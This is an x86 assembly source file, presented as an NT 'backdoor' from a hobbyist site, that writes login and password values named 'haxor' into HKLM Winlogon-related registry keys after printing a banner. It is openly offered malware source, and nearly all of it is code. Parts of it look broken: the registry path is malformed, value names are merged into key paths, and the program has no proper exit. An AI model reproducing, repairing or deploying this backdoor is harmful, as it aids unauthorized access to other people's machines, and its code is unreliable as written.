regback.asm is a backdoor for NT written in pure asm.
bd616e1d07cd327035e514a318277f4e261bebd2ecf13fd9c7c0b7b66b029a75
;tasm32 -ml regback.asm
;tasm32 -Tpe -x -c regback.obj ,,, import32
;write by asmbeginer.com
;www.asmbeginer.com/backdoor/
.386p
locals
jumps
.model flat, stdcall
extrn GetStdHandle:PROC
extrn WriteConsoleA:PROC
extrn ExitProcess:PROC
extrn RegSetValueExA:PROC
extrn RegCreateKeyExA : Proc
extrn RegCloseKey : Proc
.data
logo db "-------------------- R.E.G.B.A.C.K
---------------------------------", 13, 10
db "Write by: ASMBEGINER.COM, why? just for fun and because i have
no job ", 13, 10
db
"----------------------------------------------------------------------",
13, 10, 0
logolen equ $-logo
account db "Account ok !",13,13
accountlen equ $-account
console_in dd ?
console_out dd ?
bytes_read dd ?
hKey dd 80000002h
lpSubKey db
'\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\DefaultUserName', 0
lpSubKey2 db
'\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\DefaultPassword', 0
cbData dd 05h
lpData db '01010101',0
lpValueName db 'haxor', 0 ; login
lpValueName2 db 'haxor', 0 ; password
phkResult dd 0
lpdwDisposition dd 0
.code
start:
call init_console
push logolen
push offset logo
call write_console
call init_console
push accountlen
push offset account
call write_console
; write login
push offset lpdwDisposition
push offset phkResult
push 0
push 1F0000h + 1 + 2h
push 0
push 0
push 0
push offset lpSubKey
push hKey
call RegCreateKeyExA
push cbData
push offset lpData
push 01h
push 0
push offset lpValueName
push phkResult
call RegSetValueExA
; write password
push offset lpdwDisposition
push offset phkResult
push 0
push 1F0000h + 1 + 2h
push 0
push 0
push 0
push offset lpSubKey2
push hKey
call RegCreateKeyExA
push cbData
push offset lpData
push 01h
push 0
push offset lpValueName2
push phkResult
call RegSetValueExA
push 0
call RegCloseKey
endp
init_console proc
push -10
call GetStdHandle
or eax, eax
je init_error
mov [console_in], eax
push -11
call GetStdHandle
or eax, eax
je init_error
mov [console_out], eax
ret
init_error:
push 0
call ExitProcess
endp
write_console proc text_out:dword, text_len:dword
pusha
push 0
push offset bytes_read
push text_len
push text_out
push console_out
call WriteConsoleA
popa
ret
endp
end start